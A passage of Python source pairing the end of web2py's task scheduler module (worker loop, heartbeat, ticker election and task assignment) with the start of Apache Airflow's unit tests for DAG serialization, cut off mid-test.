Field('worker_name', length=255, unique=True),
Field('first_heartbeat', 'datetime'),
Field('last_heartbeat', 'datetime'),
Field('status', requires=IS_IN_SET(WORKER_STATUS)),
Field('is_ticker', 'boolean', default=False, writable=False),
Field('group_names', 'list:string', default=self.group_names),
Field('worker_stats', 'json'),
migrate=self.__get_migrate('scheduler_worker', migrate)
)
db.define_table(
'scheduler_task_deps',
Field('job_name', default='job_0'),
Field('task_parent', 'integer',
requires=IS_IN_DB(db, 'scheduler_task.id',
'%(task_name)s')
),
Field('task_child', 'reference scheduler_task'),
Field('can_visit', 'boolean', default=False),
migrate=self.__get_migrate('scheduler_task_deps', migrate)
)
if migrate is not False:
db.commit()
def loop(self, worker_name=None):
"""Main loop
This works basically as a neverending loop that:
- checks if the worker is ready to process tasks (is not DISABLED)
- pops a task from the queue
- if there is a task:
- spawns the executor background process
- waits for the process to be finished
- sleeps `heartbeat` seconds
- if there is not a task:
- checks for max_empty_runs
- sleeps `heartbeat` seconds
"""
signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
try:
self.start_heartbeats()
while True and self.have_heartbeat:
if self.w_stats.status == DISABLED:
logger.debug('Someone stopped me, sleeping until better'
' times come (%s)', self.w_stats.sleep)
self.sleep()
continue
logger.debug('looping...')
task = self.wrapped_pop_task()
if task:
self.w_stats.empty_runs = 0
self.w_stats.status = RUNNING
self.w_stats.total += 1
self.wrapped_report_task(task, self.async(task))
if not self.w_stats.status == DISABLED:
self.w_stats.status = ACTIVE
else:
self.w_stats.empty_runs += 1
logger.debug('sleeping...')
if self.max_empty_runs != 0:
logger.debug('empty runs %s/%s',
self.w_stats.empty_runs, self.max_empty_runs)
if self.w_stats.empty_runs >= self.max_empty_runs:
logger.info(
'empty runs limit reached, killing myself')
self.die()
self.sleep()
except (KeyboardInterrupt, SystemExit):
logger.info('catched')
self.die()
def wrapped_assign_tasks(self, db):
"""Commodity function to call `assign_tasks` and trap exceptions
If an exception is raised, assume it happened because of database
contention and retries `assign_task` after 0.5 seconds
"""
logger.debug('Assigning tasks...')
db.commit() # db.commit() only for Mysql
x = 0
while x < 10:
try:
self.assign_tasks(db)
db.commit()
logger.debug('Tasks assigned...')
break
except:
self.w_stats.errors += 1
db.rollback()
logger.error('TICKER: error assigning tasks (%s)', x)
x += 1
time.sleep(0.5)
def wrapped_pop_task(self):
"""Commodity function to call `pop_task` and trap exceptions
If an exception is raised, assume it happened because of database
contention and retries `pop_task` after 0.5 seconds
"""
db = self.db
db.commit() # another nifty db.commit() only for Mysql
x = 0
while x < 10:
try:
rtn = self.pop_task(db)
return rtn
break
except:
self.w_stats.errors += 1
db.rollback()
logger.error(' error popping tasks')
x += 1
time.sleep(0.5)
def pop_task(self, db):
"""Grabs a task ready to be executed from the queue"""
now = self.now()
st = self.db.scheduler_task
if self.is_a_ticker and self.do_assign_tasks:
#I'm a ticker, and 5 loops passed without reassigning tasks,
#let's do that and loop again
self.wrapped_assign_tasks(db)
return None
# ready to process something
grabbed = db(
(st.assigned_worker_name == self.worker_name) &
(st.status == ASSIGNED)
)
task = grabbed.select(limitby=(0, 1), orderby=st.next_run_time).first()
if task:
task.update_record(status=RUNNING, last_run_time=now)
# noone will touch my task!
db.commit()
logger.debug(' work to do %s', task.id)
else:
if self.is_a_ticker and self.greedy:
# there are other tasks ready to be assigned
logger.info('TICKER: greedy loop')
self.wrapped_assign_tasks(db)
else:
logger.info('nothing to do')
return None
times_run = task.times_run + 1
if not task.prevent_drift:
next_run_time = task.last_run_time + datetime.timedelta(
seconds=task.period
)
else:
next_run_time = task.start_time + datetime.timedelta(
seconds=task.period * times_run
)
if times_run < task.repeats or task.repeats == 0:
# need to run (repeating task)
run_again = True
else:
# no need to run again
run_again = False
run_id = 0
while True and not self.discard_results:
logger.debug(' new scheduler_run record')
try:
run_id = db.scheduler_run.insert(
task_id=task.id,
status=RUNNING,
start_time=now,
worker_name=self.worker_name)
db.commit()
break
except:
time.sleep(0.5)
db.rollback()
logger.info('new task %(id)s "%(task_name)s"'
' %(application_name)s.%(function_name)s' % task)
return Task(
app=task.application_name,
function=task.function_name,
timeout=task.timeout,
args=task.args, # in json
vars=task.vars, # in json
task_id=task.id,
run_id=run_id,
run_again=run_again,
next_run_time=next_run_time,
times_run=times_run,
stop_time=task.stop_time,
retry_failed=task.retry_failed,
times_failed=task.times_failed,
sync_output=task.sync_output,
uuid=task.uuid)
def wrapped_report_task(self, task, task_report):
"""Commodity function to call `report_task` and trap exceptions
If an exception is raised, assume it happened because of database
contention and retries `pop_task` after 0.5 seconds
"""
db = self.db
while True:
try:
self.report_task(task, task_report)
db.commit()
break
except:
self.w_stats.errors += 1
db.rollback()
logger.error(' error storing result')
time.sleep(0.5)
def report_task(self, task, task_report):
"""Takes care of storing the result according to preferences
and deals with logic for repeating tasks"""
db = self.db
now = self.now()
st = db.scheduler_task
sr = db.scheduler_run
if not self.discard_results:
if task_report.result != 'null' or task_report.tb:
# result is 'null' as a string if task completed
# if it's stopped it's None as NoneType, so we record
# the STOPPED "run" anyway
logger.debug(' recording task report in db (%s)',
task_report.status)
db(sr.id == task.run_id).update(
status=task_report.status,
stop_time=now,
run_result=task_report.result,
run_output=task_report.output,
traceback=task_report.tb)
else:
logger.debug(' deleting task report in db because of no result')
db(sr.id == task.run_id).delete()
# if there is a stop_time and the following run would exceed it
is_expired = (task.stop_time
and task.next_run_time > task.stop_time
and True or False)
status = (task.run_again and is_expired and EXPIRED
or task.run_again and not is_expired
and QUEUED or COMPLETED)
if task_report.status == COMPLETED:
d = dict(status=status,
next_run_time=task.next_run_time,
times_run=task.times_run,
times_failed=0
)
db(st.id == task.task_id).update(**d)
if status == COMPLETED:
self.update_dependencies(db, task.task_id)
else:
st_mapping = {'FAILED': 'FAILED',
'TIMEOUT': 'TIMEOUT',
'STOPPED': 'QUEUED'}[task_report.status]
status = (task.retry_failed
and task.times_failed < task.retry_failed
and QUEUED or task.retry_failed == -1
and QUEUED or st_mapping)
db(st.id == task.task_id).update(
times_failed=db.scheduler_task.times_failed + 1,
next_run_time=task.next_run_time,
status=status
)
logger.info('task completed (%s)', task_report.status)
def update_dependencies(self, db, task_id):
db(db.scheduler_task_deps.task_child == task_id).update(can_visit=True)
def adj_hibernation(self):
"""Used to increase the "sleep" interval for DISABLED workers"""
if self.w_stats.status == DISABLED:
wk_st = self.w_stats.sleep
hibernation = wk_st + HEARTBEAT if wk_st < MAXHIBERNATION else MAXHIBERNATION
self.w_stats.sleep = hibernation
def send_heartbeat(self, counter):
"""This function is vital for proper coordination among available
workers.
It:
- sends the heartbeat
- elects a ticker among available workers (the only process that
effectively dispatch tasks to workers)
- deals with worker's statuses
- does "housecleaning" for dead workers
- triggers tasks assignment to workers
"""
if not self.db_thread:
logger.debug('thread building own DAL object')
self.db_thread = DAL(
self.db._uri, folder=self.db._adapter.folder)
self.define_tables(self.db_thread, migrate=False)
try:
db = self.db_thread
sw, st = db.scheduler_worker, db.scheduler_task
now = self.now()
# record heartbeat
mybackedstatus = db(sw.worker_name == self.worker_name).select().first()
if not mybackedstatus:
sw.insert(status=ACTIVE, worker_name=self.worker_name,
first_heartbeat=now, last_heartbeat=now,
group_names=self.group_names,
worker_stats=self.w_stats)
self.w_stats.status = ACTIVE
self.w_stats.sleep = self.heartbeat
mybackedstatus = ACTIVE
else:
mybackedstatus = mybackedstatus.status
if mybackedstatus == DISABLED:
# keep sleeping
self.w_stats.status = DISABLED
logger.debug('........recording heartbeat (%s)',
self.w_stats.status)
db(sw.worker_name == self.worker_name).update(
last_heartbeat=now,
worker_stats=self.w_stats)
elif mybackedstatus == TERMINATE:
self.w_stats.status = TERMINATE
logger.debug("Waiting to terminate the current task")
self.give_up()
elif mybackedstatus == KILL:
self.w_stats.status = KILL
self.die()
return
else:
if mybackedstatus == STOP_TASK:
logger.info('Asked to kill the current task')
self.terminate_process()
logger.debug('........recording heartbeat (%s)',
self.w_stats.status)
db(sw.worker_name == self.worker_name).update(
last_heartbeat=now, status=ACTIVE,
worker_stats=self.w_stats)
self.w_stats.sleep = self.heartbeat # re-activating the process
if self.w_stats.status != RUNNING:
self.w_stats.status = ACTIVE
self.do_assign_tasks = False
if counter % 5 == 0 or mybackedstatus == PICK:
try:
# delete dead workers
expiration = now - datetime.timedelta(
seconds=self.heartbeat * 3)
departure = now - datetime.timedelta(
seconds=self.heartbeat * 3 * 15)
logger.debug(
' freeing workers that have not sent heartbeat')
dead_workers = db(
((sw.last_heartbeat < expiration) & (sw.status == ACTIVE)) |
((sw.last_heartbeat < departure) & (sw.status != ACTIVE))
)
dead_workers_name = dead_workers._select(sw.worker_name)
db(
(st.assigned_worker_name.belongs(dead_workers_name)) &
(st.status == RUNNING)
).update(assigned_worker_name='', status=QUEUED)
dead_workers.delete()
try:
self.is_a_ticker = self.being_a_ticker()
except:
logger.error('Error coordinating TICKER')
if self.w_stats.status == ACTIVE:
self.do_assign_tasks = True
except:
logger.error('Error cleaning up')
db.commit()
except:
logger.error('Error retrieving status')
db.rollback()
self.adj_hibernation()
self.sleep()
def being_a_ticker(self):
"""Elects a TICKER process that assigns tasks to available workers.
Does its best to elect a worker that is not busy processing other tasks
to allow a proper distribution of tasks among all active workers ASAP
"""
db = self.db_thread
sw = db.scheduler_worker
my_name = self.worker_name
all_active = db(
(sw.worker_name != my_name) & (sw.status == ACTIVE)
).select(sw.is_ticker, sw.worker_name)
ticker = all_active.find(lambda row: row.is_ticker is True).first()
not_busy = self.w_stats.status == ACTIVE
if not ticker:
# if no other tickers are around
if not_busy:
# only if I'm not busy
db(sw.worker_name == my_name).update(is_ticker=True)
db(sw.worker_name != my_name).update(is_ticker=False)
logger.info("TICKER: I'm a ticker")
else:
# I'm busy
if len(all_active) >= 1:
# so I'll "downgrade" myself to a "poor worker"
db(sw.worker_name == my_name).update(is_ticker=False)
else:
not_busy = True
db.commit()
return not_busy
else:
logger.info(
"%s is a ticker, I'm a poor worker" % ticker.worker_name)
return False
def assign_tasks(self, db):
"""Assigns task to workers, that can then pop them from the queue
Deals with group_name(s) logic, in order to assign linearly tasks
to available workers for those groups
"""
sw, st, sd = db.scheduler_worker, db.scheduler_task, db.scheduler_task_deps
now = self.now()
all_workers = db(sw.status == ACTIVE).select()
# build workers as dict of groups
wkgroups = {}
for w in all_workers:
if w.worker_stats['status'] == 'RUNNING':
continue
group_names = w.group_names
for gname in group_names:
if gname not in wkgroups:
wkgroups[gname] = dict(
workers=[{'name': w.worker_name, 'c': 0}])
else:
wkgroups[gname]['workers'].append(
{'name': w.worker_name, 'c': 0})
# set queued tasks that expired between "runs" (i.e., you turned off
# the scheduler): then it wasn't expired, but now it is
db(
(st.status.belongs((QUEUED, ASSIGNED))) &
(st.stop_time < now)
).update(status=EXPIRED)
# calculate dependencies
deps_with_no_deps = db(
(sd.can_visit == False) &
(~sd.task_child.belongs(
db(sd.can_visit == False)._select(sd.task_parent)
)
)
)._select(sd.task_child)
no_deps = db(
(st.status.belongs((QUEUED, ASSIGNED))) &
(
(sd.id == None) | (st.id.belongs(deps_with_no_deps))
)
)._select(st.id, distinct=True, left=sd.on(
(st.id == sd.task_parent) &
(sd.can_visit == False)
)
)
all_available = db(
(st.status.belongs((QUEUED, ASSIGNED))) &
((st.times_run < st.repeats) | (st.repeats == 0)) &
(st.start_time <= now) &
((st.stop_time == None) | (st.stop_time > now)) &
(st.next_run_time <= now) &
(st.enabled == True) &
(st.id.belongs(no_deps))
)
limit = len(all_workers) * (50 / (len(wkgroups) or 1))
# if there are a moltitude of tasks, let's figure out a maximum of
# tasks per worker. This can be further tuned with some added
# intelligence (like esteeming how many tasks will a worker complete
# before the ticker reassign them around, but the gain is quite small
# 50 is a sweet spot also for fast tasks, with sane heartbeat values
# NB: ticker reassign tasks every 5 cycles, so if a worker completes its
# 50 tasks in less than heartbeat*5 seconds,
# it won't pick new tasks until heartbeat*5 seconds pass.
# If a worker is currently elaborating a long task, its tasks needs to
# be reassigned to other workers
# this shuffles up things a bit, in order to give a task equal chances
# to be executed
# let's freeze it up
db.commit()
x = 0
for group in wkgroups.keys():
tasks = all_available(st.group_name == group).select(
limitby=(0, limit), orderby = st.next_run_time)
# let's break up the queue evenly among workers
for task in tasks:
x += 1
gname = task.group_name
ws = wkgroups.get(gname)
if ws:
counter = 0
myw = 0
for i, w in enumerate(ws['workers']):
if w['c'] < counter:
myw = i
counter = w['c']
assigned_wn = wkgroups[gname]['workers'][myw]['name']
d = dict(
status=ASSIGNED,
assigned_worker_name=assigned_wn
)
if not task.task_name:
d['task_name'] = task.function_name
db(
(st.id == task.id) &
(st.status.belongs((QUEUED, ASSIGNED)))
).update(**d)
wkgroups[gname]['workers'][myw]['c'] += 1
db.commit()
# I didn't report tasks but I'm working nonetheless!!!!
if x > 0:
self.w_stats.empty_runs = 0
self.w_stats.queue = x
self.w_stats.distribution = wkgroups
self.w_stats.workers = len(all_workers)
# I'll be greedy only if tasks assigned are equal to the limit
# (meaning there could be others ready to be assigned)
self.greedy = x >= limit
logger.info('TICKER: workers are %s', len(all_workers))
logger.info('TICKER: tasks are %s', x)
def sleep(self):
"""Calculates the number of seconds to sleep according to worker's
status and `heartbeat` parameter"""
time.sleep(self.w_stats.sleep)
# should only sleep until next available task
def set_worker_status(self, group_names=None, action=ACTIVE,
exclude=None, limit=None, worker_name=None):
"""Internal function to set worker's status"""
ws = self.db.scheduler_worker
if not group_names:
group_names = self.group_names
elif isinstance(group_names, str):
group_names = [group_names]
if worker_name:
self.db(ws.worker_name == worker_name).update(status=action)
return
exclusion = exclude and exclude.append(action) or [action]
if not limit:
for group in group_names:
self.db(
(ws.group_names.contains(group)) &
(~ws.status.belongs(exclusion))
).update(status=action)
else:
for group in group_names:
workers = self.db((ws.group_names.contains(group)) &
(~ws.status.belongs(exclusion))
)._select(ws.id, limitby=(0, limit))
self.db(ws.id.belongs(workers)).update(status=action)
def disable(self, group_names=None, limit=None, worker_name=None):
"""Sets DISABLED on the workers processing `group_names` tasks.
A DISABLED worker will be kept alive but it won't be able to process
any waiting tasks, essentially putting it to sleep.
By default, all group_names of Scheduler's instantation are selected"""
self.set_worker_status(
group_names=group_names,
action=DISABLED,
exclude=[DISABLED, KILL, TERMINATE],
limit=limit)
def resume(self, group_names=None, limit=None, worker_name=None):
"""Wakes a worker up (it will be able to process queued tasks)"""
self.set_worker_status(
group_names=group_names,
action=ACTIVE,
exclude=[KILL, TERMINATE],
limit=limit)
def terminate(self, group_names=None, limit=None, worker_name=None):
"""Sets TERMINATE as worker status. The worker will wait for any
currently running tasks to be executed and then it will exit gracefully
"""
self.set_worker_status(
group_names=group_names,
action=TERMINATE,
exclude=[KILL],
limit=limit)
def kill(self, group_names=None, limit=None, worker_name=None):
"""Sets KILL as worker status. The worker will be killed even if it's
processing a task."""
self.set_worker_status(
group_names=group_names,
action=KILL,
limit=limit)
def queue_task(self, function, pargs=[], pvars={}, **kwargs):
"""
Queue tasks. This takes care of handling the validation of all
parameters
Args:
function: the function (anything callable with a __name__)
pargs: "raw" args to be passed to the function. Automatically
jsonified.
pvars: "raw" kwargs to be passed to the function. Automatically
jsonified
kwargs: all the parameters available (basically, every
`scheduler_task` column). If args and vars are here, they should
be jsonified already, and they will override pargs and pvars
Returns:
a dict just as a normal validate_and_insert(), plus a uuid key
holding the uuid of the queued task. If validation is not passed
( i.e. some parameters are invalid) both id and uuid will be None,
and you'll get an "error" dict holding the errors found.
"""
if hasattr(function, '__name__'):
function = function.__name__
targs = 'args' in kwargs and kwargs.pop('args') or dumps(pargs)
tvars = 'vars' in kwargs and kwargs.pop('vars') or dumps(pvars)
tuuid = 'uuid' in kwargs and kwargs.pop('uuid') or web2py_uuid()
tname = 'task_name' in kwargs and kwargs.pop('task_name') or function
immediate = 'immediate' in kwargs and kwargs.pop('immediate') or None
rtn = self.db.scheduler_task.validate_and_insert(
function_name=function,
task_name=tname,
args=targs,
vars=tvars,
uuid=tuuid,
**kwargs)
if not rtn.errors:
rtn.uuid = tuuid
if immediate:
self.db(
(self.db.scheduler_worker.is_ticker == True)
).update(status=PICK)
else:
rtn.uuid = None
return rtn
def task_status(self, ref, output=False):
"""
Retrieves task status and optionally the result of the task
Args:
ref: can be
- an integer : lookup will be done by scheduler_task.id
- a string : lookup will be done by scheduler_task.uuid
- a `Query` : lookup as you wish, e.g. ::
db.scheduler_task.task_name == 'test1'
output(bool): if `True`, fetch also the scheduler_run record
Returns:
a single Row object, for the last queued task.
If output == True, returns also the last scheduler_run record.
The scheduler_run record is fetched by a left join, so it can
have all fields == None
"""
from pydal.objects import Query
sr, st = self.db.scheduler_run, self.db.scheduler_task
if isinstance(ref, (int, long)):
q = st.id == ref
elif isinstance(ref, str):
q = st.uuid == ref
elif isinstance(ref, Query):
q = ref
else:
raise SyntaxError(
"You can retrieve results only by id, uuid or Query")
fields = [st.ALL]
left = False
orderby = ~st.id
if output:
fields = st.ALL, sr.ALL
left = sr.on(sr.task_id == st.id)
orderby = ~st.id | ~sr.id
row = self.db(q).select(
*fields,
**dict(orderby=orderby,
left=left,
limitby=(0, 1))
).first()
if row and output:
row.result = row.scheduler_run.run_result and \
loads(row.scheduler_run.run_result,
object_hook=_decode_dict) or None
return row
def stop_task(self, ref):
"""Shortcut for task termination.
If the task is RUNNING it will terminate it, meaning that status
will be set as FAILED.
If the task is QUEUED, its stop_time will be set as to "now",
the enabled flag will be set to False, and the status to STOPPED
Args:
ref: can be
- an integer : lookup will be done by scheduler_task.id
- a string : lookup will be done by scheduler_task.uuid
Returns:
- 1 if task was stopped (meaning an update has been done)
- None if task was not found, or if task was not RUNNING or QUEUED
Note:
Experimental
"""
st, sw = self.db.scheduler_task, self.db.scheduler_worker
if isinstance(ref, (int, long)):
q = st.id == ref
elif isinstance(ref, str):
q = st.uuid == ref
else:
raise SyntaxError(
"You can retrieve results only by id or uuid")
task = self.db(q).select(st.id, st.status, st.assigned_worker_name)
task = task.first()
rtn = None
if not task:
return rtn
if task.status == 'RUNNING':
q = sw.worker_name == task.assigned_worker_name
rtn = self.db(q).update(status=STOP_TASK)
elif task.status == 'QUEUED':
rtn = self.db(q).update(
stop_time=self.now(),
enabled=False,
status=STOPPED)
return rtn
def get_workers(self, only_ticker=False):
""" Returns a dict holding `worker_name : {**columns}`
representing all "registered" workers
only_ticker returns only the workers running as a TICKER,
if there are any
"""
db = self.db
if only_ticker:
workers = db(db.scheduler_worker.is_ticker == True).select()
else:
workers = db(db.scheduler_worker.id > 0).select()
all_workers = {}
for row in workers:
all_workers[row.worker_name] = Storage(
status=row.status,
first_heartbeat=row.first_heartbeat,
last_heartbeat=row.last_heartbeat,
group_names=row.group_names,
is_ticker=row.is_ticker,
worker_stats=row.worker_stats
)
return all_workers
def main():
"""
allows to run worker without python web2py.py .... by simply::
python gluon/scheduler.py
"""
parser = optparse.OptionParser()
parser.add_option(
"-w", "--worker_name", dest="worker_name", default=None,
help="start a worker with name")
parser.add_option(
"-b", "--heartbeat", dest="heartbeat", default=10,
type='int', help="heartbeat time in seconds (default 10)")
parser.add_option(
"-L", "--logger_level", dest="logger_level",
default=30,
type='int',
help="set debug output level (0-100, 0 means all, 100 means none;default is 30)")
parser.add_option("-E", "--empty-runs",
dest="max_empty_runs",
type='int',
default=0,
help="max loops with no grabbed tasks permitted (0 for never check)")
parser.add_option(
"-g", "--group_names", dest="group_names",
default='main',
help="comma separated list of groups to be picked by the worker")
parser.add_option(
"-f", "--db_folder", dest="db_folder",
default='/Users/mdipierro/web2py/applications/scheduler/databases',
help="location of the dal database folder")
parser.add_option(
"-u", "--db_uri", dest="db_uri",
default='sqlite://storage.sqlite',
help="database URI string (web2py DAL syntax)")
parser.add_option(
"-t", "--tasks", dest="tasks", default=None,
help="file containing task files, must define" +
"tasks = {'task_name':(lambda: 'output')} or similar set of tasks")
parser.add_option(
"-U", "--utc-time", dest="utc_time", default=False,
help="work with UTC timestamps"
)
(options, args) = parser.parse_args()
if not options.tasks or not options.db_uri:
print USAGE
if options.tasks:
path, filename = os.path.split(options.tasks)
if filename.endswith('.py'):
filename = filename[:-3]
sys.path.append(path)
print 'importing tasks...'
tasks = __import__(filename, globals(), locals(), [], -1).tasks
print 'tasks found: ' + ', '.join(tasks.keys())
else:
tasks = {}
group_names = [x.strip() for x in options.group_names.split(',')]
logging.getLogger().setLevel(options.logger_level)
print 'groups for this worker: ' + ', '.join(group_names)
print 'connecting to database in folder: ' + options.db_folder or './'
print 'using URI: ' + options.db_uri
db = DAL(options.db_uri, folder=options.db_folder)
print 'instantiating scheduler...'
scheduler = Scheduler(db=db,
worker_name=options.worker_name,
tasks=tasks,
migrate=True,
group_names=group_names,
heartbeat=options.heartbeat,
max_empty_runs=options.max_empty_runs,
utc_time=options.utc_time)
signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
print 'starting main worker loop...'
scheduler.loop()
if __name__ == '__main__':
main()
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta
from glob import glob
from unittest import mock
from dateutil.relativedelta import FR, relativedelta
from parameterized import parameterized
from airflow.hooks.base_hook import BaseHook
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.operators.bash import BashOperator
from airflow.operators.subdag_operator import SubDagOperator
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {
"__type": "timedelta",
"__var": 300.0
}
}
},
"start_date": 1564617600.0,
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"bash_command": "echo {{ task.task_id }}",
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [
"can_dag_read",
"can_dag_edit"
]
}
}
}
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={
"test_role": {"can_dag_read", "can_dag_edit"}
}
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(task_id='bash_task', bash_command='echo {{ task.task_id }}', owner='airflow')
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
""" Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {
'start_date': datetime(2019, 7, 10)
}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={
'hello': lambda name: 'Hello %s' % name
},
catchup=False
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags():
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue):
"""Validate pickle in a subprocess."""
dags = collect_dags()
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=('{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}')))
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(
serialized_dags['simple_dag'],
serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(
json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"],
key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
self.assertEqual(sorted_serialized_dag(ground_truth_dag),
sorted_serialized_dag(json_dag))
def test_deserialization(self):
"""A serialized DAG can be deserialized in another process."""
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=serialize_subprocess, args=(queue,))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags()
self.assertTrue(set(stringified_dags.keys()) == set(dags.keys()))
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
example_skip_dag = stringified_dags['example_skip_dag']
skip_operator_1_task = example_skip_dag.task_dict['skip_operator_1']
self.validate_deserialized_task(
skip_operator_1_task, 'DummySkipOperator', '#e8b7e4', '#000')
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
self.assertTrue(hasattr(example_skip_dag, 'full_filepath'))
self.assertEqual(example_skip_dag.full_filepath, example_skip_dag.fileloc)
example_subdag_operator = stringified_dags['example_subdag_operator']
section_1_task = example_subdag_operator.task_dict['section-1']
self.validate_deserialized_task(
section_1_task,
SubDagOperator.__name__,
SubDagOperator.ui_color,
SubDagOperator.ui_fgcolor
)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = [
"task_ids", "params", "fileloc", "max_active_runs", "concurrency",
"is_paused_upon_creation", "doc_md", "safe_dag_id", "is_subdag",
"catchup", "description", "start_date", "end_date", "parent_dag",
"template_searchpath", "_access_control"
]
# fields_to_check = dag.get_serialized_fields()
for field in fields_to_check:
self.assertEqual(getattr(serialized_dag, field), getattr(dag, field))
def validate_deserialized_task(self, task, task_type, ui_color, ui_fgcolor):
"""Verify non-airflow operators are casted to BaseOperator."""
self.assertTrue(isinstance(task, SerializedBaseOperator))
# Verify the original operator class is recorded for UI.
self.assertTrue(task.task_type == task_type)
self.assertTrue(task.ui_color == ui_color)
self.assertTrue(task.ui_fgcolor == ui_fgcolor)
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
self.assertIsNotNone(task.subdag)
self.assertTrue(isinstance(task.subdag, DAG))
else:
self.assertIsNone(task.subdag)
self.assertEqual({}, task.params)
self.assertEqual({}, task.executor_config)
@parameterized.expand([
(datetime(2019, 8, 1), None, datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 8, 2), datetime(2019, 8, 2)),
(datetime(2019, 8, 1), datetime(2019, 7, 30), datetime(2019, 8, 1)),
])
def test_deserialization_start_date(self,
dag_start_date,
task_start_date,
expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
